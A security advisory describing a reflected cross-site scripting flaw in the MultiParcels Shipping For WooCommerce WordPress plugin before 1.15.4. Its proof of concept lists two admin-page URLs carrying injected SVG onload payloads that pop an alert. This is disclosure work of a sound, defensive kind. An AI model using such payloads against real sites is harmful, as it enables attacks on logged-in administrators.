WordPress Plugin Vulnerabilities

MultiParcels Shipping For WooCommerce < 1.15.4 - Reflected XSS

Description

The plugin does not sanitise and escape various parameters before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Note: The issue was fixed in 1.14.15 but re-introduced in 1.14.16

Proof of Concept

Make a logged in admin open one of the URL below:

http://example.com/wp-admin/admin.php?page=multiparcels-shipping-for-woocommerce&tab=sender-details&data[name]='><svg/onload=alert(/XSS/)>
http://example.com/wp-admin/admin.php?page=multiparcels-shipping-for-woocommerce&tab=sender-details&errors[name][][text]=<svg/onload=alert(/XSS/)>

Affects Plugins

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes

Timeline

Publicly Published
2023-07-17 (about 10 months ago)
Added
2023-07-17 (about 10 months ago)
Last Updated
2023-07-27 (about 9 months ago)

Other